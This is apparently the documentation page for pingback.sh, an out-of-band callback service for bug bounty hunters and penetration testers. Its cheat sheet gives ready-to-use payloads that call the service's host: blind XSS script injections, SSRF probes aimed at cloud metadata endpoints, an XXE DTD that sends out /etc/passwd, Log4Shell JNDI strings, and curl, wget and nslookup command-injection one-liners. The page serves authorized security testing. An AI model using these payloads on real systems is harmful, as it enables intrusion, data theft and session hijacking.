Overview
pingback.sh is an out-of-band (OOB) testing platform built for bug bounty hunters,
penetration testers and security teams.
It captures incoming DNS, HTTP, HTTPS, SMTP and blind XSS callbacks from your targets and shows them in a live dashboard with useful context such as headers, body, source IP, country, ASN, reverse DNS, user-agent and protocol type.
Use it when you suspect a vulnerability that does not reflect output directly in the HTTP response: SSRF, blind SSRF, blind XSS in admin panels, XXE, blind XXE, server-side template injection, Log4Shell-style injections, command injection without stdout, SMTP-based bugs and other callback-based findings.
Firefox Add-on
Pingback.sh also provides a free Firefox extension for researchers who want to test forms faster.
The extension can scan pages, discover forms and inject payloads intelligently into fields that are likely to accept URLs, webhooks, callback endpoints, image sources, import links or other SSRF-prone inputs.
- Automatic form discovery
- Smart SSRF payload injection
- One-click listener generation
- Fast testing of URL, webhook and callback fields
- Direct integration with pingback.sh
Install it here: Pingback.sh Helper on Mozilla Add-ons
Getting started
Generate a listener from your dashboard. You'll receive:
- ✓ A unique subdomain like
xyz1abc2.pingback.sh - ✓ Ready-to-paste payloads for HTTP, DNS, XSS and SMTP
- ✓ A secret dashboard URL to view your captures
- ✓ Optional email, Discord and Telegram notifications
Payloads cheat sheet
For a listener at xxx.pingback.sh, drop any of these in suspicious inputs:
| Protocol | Payload | Triggers when |
|---|---|---|
| HTTP/HTTPS | https://xxx.pingback.sh/ | Target makes an outbound HTTP request |
| DNS | xxx.pingback.sh | Target's DNS resolver looks up the hostname |
| Blind XSS | "><script src=//xxx.pingback.sh/x></script> | Target's user, such as an admin, renders your payload |
| SMTP | anything@xxx.pingback.sh | Target sends an email to this address |
SSRF (Server-Side Request Forgery)
Replace any URL parameter, webhook field or fetched-resource input with your listener URL.
POST /api/import?url=https://xxx.pingback.sh/ POST /webhooks { "callback": "https://xxx.pingback.sh/secret" } GET /image-proxy?src=https://xxx.pingback.sh/a.png
Cloud metadata testing
Use your listener as the canary first. Confirm the callback before testing internal or cloud metadata endpoints.
?url=http://xxx.pingback.sh/test # confirm SSRF works
?url=http://169.254.169.254/latest/meta-data/ # AWS metadata
?url=http://metadata.google.internal/computeMetadata/v1/ # GCP
DNS-only SSRF
When HTTP egress is blocked but DNS resolution works:
?url=https://xxx.pingback.sh/anything
If you see a DNS hit but no HTTP hit, the target resolved your domain but could not reach it.
XXE (XML External Entity)
Inject an external entity that references your listener:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "https://xxx.pingback.sh/xxe">
]>
<foo>&xxe;</foo>
Blind XXE with parameter entities
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "https://xxx.pingback.sh/exfil.dtd">
%dtd;
]>
Host exfil.dtd on a controlled server, with:
<!ENTITY % all "<!ENTITY % send SYSTEM 'https://xxx.pingback.sh/?d=%file;'>"> %all; %send;
The captured request path may contain the requested file content if the parser allows external entities.
Blind XSS
The Blind XSS payload at /x helps prove that a stored payload was rendered by another user,
such as an admin, support agent or back-office operator.
Common contexts
// HTML context <script src=//xxx.pingback.sh/x></script> // Attribute context "><script src=//xxx.pingback.sh/x></script> '><script src=//xxx.pingback.sh/x></script> // JavaScript string context ';document.body.appendChild(document.createElement('script')).src='//xxx.pingback.sh/x';//
Where to inject
- Profile fields: name, bio, company
- Support ticket subjects and bodies
- Filenames on file uploads
- Referer and User-Agent headers
- Comments rendered in internal dashboards
- Search queries logged in admin panels
Log4j / JNDI injection
For Log4Shell-style bugs, inject into fields likely to be logged:
${jndi:ldap://xxx.pingback.sh/a}
${jndi:dns://xxx.pingback.sh}
${jndi:rmi://xxx.pingback.sh/a}
Headers to try: User-Agent, Referer, X-Forwarded-For,
X-Api-Version. Even a DNS hit can confirm that a lookup happened.
Command injection (out-of-band confirmation)
When the response does not reflect command output, use the listener to confirm execution:
# Linux ; curl https://xxx.pingback.sh/$(whoami) | nslookup $(hostname).xxx.pingback.sh`wget -O- https://xxx.pingback.sh/proof` # Windows & nslookup %COMPUTERNAME%.xxx.pingback.sh& powershell -c "iwr https://xxx.pingback.sh/$env:USERNAME"
The captured path can help prove execution when direct output is not visible.
SMTP / email-based bugs
Use anything@xxx.pingback.sh in:
- Password reset forms
- Invitation systems
- Newsletter signups
- Webhook configurations that send email on events
- Contact forms and support forms
You will see an SMTP hit with connection metadata, sender information and delivery details.
Notifications
When generating a listener, you can add:
- Email: receive an email when a hit arrives.
- Discord webhook: send rich notifications to your Discord channel.
- Telegram: receive instant mobile notifications through Telegram.
- Label: add a private tag like
h1-acme-testto remember which test the listener belongs to.
You can also bookmark the dashboard URL and monitor hits directly from the live feed.
Dashboard
Your dashboard is at https://pingback.sh/dashboard?t=YOUR_SECRET_TOKEN.
- Live feed updates automatically
- Filter by protocol: HTTP, DNS, XSS, SMTP
- Click any hit to inspect headers, body and metadata
- View IP intelligence, ASN, country and reverse DNS
- Export captures to JSON for your report
- Wipe the listener and all its hits when you are done
Privacy
pingback.sh captures whatever the target sends to it. By design, this may include sensitive data:
internal IPs, headers, cookies, session tokens, email contents or request bodies.
- Your secret token is hashed before storage.
- Your dashboard URL is private and should be treated like an API key.
- The admin panel is designed for abuse handling and operational monitoring.
- Do not paste dashboard URLs in public reports, screenshots or chat logs.
FAQ
Can I use the Firefox add-on for free?
Yes. The Pingback.sh Helper add-on is free on Mozilla Add-ons. It helps scan pages, find forms and inject SSRF-oriented payloads intelligently into fields that look interesting.
Can I use this in a paid bug bounty program?
Yes. pingback.sh is a testing tool for OOB evidence collection. Always use it responsibly and only
within the authorized scope of the program you are testing.
Why do I get only DNS hits and no HTTP?
The target's DNS resolver looked up your domain, but an egress firewall may have blocked the actual HTTP request. This still provides useful evidence that the target attempted to resolve your controlled hostname.
Why use Pingback?
Pingback.sh gives you a dedicated web dashboard with DNS, HTTP, HTTPS, SMTP and Blind XSS monitoring, plus email, Discord and Telegram notifications. It also includes API access and a free Firefox extension for faster form testing and smart payload injection.
Are my captures private?
Captures are accessible through the secret dashboard URL for the listener. Keep this URL private and do not share it publicly.
I lost my dashboard URL. Can you recover it?
No. The dashboard token is the access key for the listener. If you lose it, generate a new listener.